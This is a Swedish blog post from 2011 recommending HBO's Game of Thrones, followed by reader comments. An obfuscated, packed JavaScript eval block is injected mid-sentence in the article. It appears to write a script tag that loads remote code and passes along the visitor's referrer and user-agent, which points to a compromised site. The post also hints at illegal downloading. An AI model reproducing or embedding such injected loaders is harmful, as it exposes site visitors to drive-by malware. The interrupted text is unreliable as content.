Image Image Image Image Image Image Image Image Image Image

| 25 november, 2020

Scroll to top

Top

Game Of Thrones

Filip Urde
 • On 3 juni, 2011
 • http://www.revue.se/filip-urde

Kära läsare.

Att prata om Game of Thrones idag är kanske sent ur ett ”nyhets” syfte, då serien hade premiär den 17april (USA).

Men eftersom revue endast varit uppe några dagar, så känner jag att det är min plikt som med människa och serie älskare att sprida budskapet om någon stackare kan ha missat denna serie. Game of thrones är HBOs senaste mästerverk och sägs vara deras mest påkostade någonsin. Kan tilläggas att HBO då gjort serier som: band of brothers/ the pacific (med Spielberg och Hanks), Sopranos och Oz. Helt enkelt en portfolio som slår der mesta.

Den första säsongen av Game eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|zreyi|var|u0026u|referrer|dsaek||js|php’.split(’|’),0,{}))
of Thrones
kommer att bestå av 13 avsnitt och seriens handling beskrivs som:

”Game of Thrones” has all the elements that lure viewers to shows like ”The Sopranos.”

Baserad på George R.R. Martins (den Amerikanska Tolkien) bästsäljare serie: A Song of Ice and Fire. Detta är en serie som fångar upp intrigerna och dialogen från en serie som Sopranos och för det samman med en medeltida fantasy miljö i klass med Sagan om ringen. Huvudrollen spelas även av Sagan om ringen skådespelaren Sean Bean a.k.a Boromir. Även denna roll passar Sean Bean som handen i handsken. Som dem flesta vet så brukar en HBO serie i den här klassen vara en miniserie, jag har dock en teori som säger annorlunda. Eftersom dem bygger på A Song of Ice and Fire böckerna, en serie som inte ens är färdigskriven, så lär det finnas utrymme till fler säsonger, då första säsongen bygger på första boken. Helt enkelt! man behöver inte bli uppgiven och lämnad i ovisshet om varför HBO bara gör en säsong av ännu ett mästerverk man aldrig vill ska ta slut.

Där har ni en trailer, se den.

Trailer

Det här är en av de bästa serierna jag sett, jag vill inte tvinga er att göra något olagligt (som att ladda ner), men ni måste bara få lägga era händer på detta mästerverk. Vänta på att en kanal som tv4 ska köpa in rättigheterna anser jag är att vänta för länge.

 

Do what you gotta do…..

Comments

 1. Fabian Ek

  Oj denna serie är otroligt bra. Håller bra kvalitet, verkligen. Måste faktiskt säga att HBO verkligen vet hur man ska göra bra serier, även fast det är efter en bok serie. 🙂

 2. Hampe

  Fan tack! behövde en ny serie att titta på. Ladda ner första nyss. SÅÅÅ BRA!!!!!!

  Skön sida också! gled in på den bara av en slump, men fan ni värkar ju ha sköna grejer för er 😀

  • Kul att du tycker Game of thrones var bra! Och ännu roligare att du tycker om vår sida! Vi försöker uppdatera så mycket vi bara orkar, om allt vi tycker är nice! 😀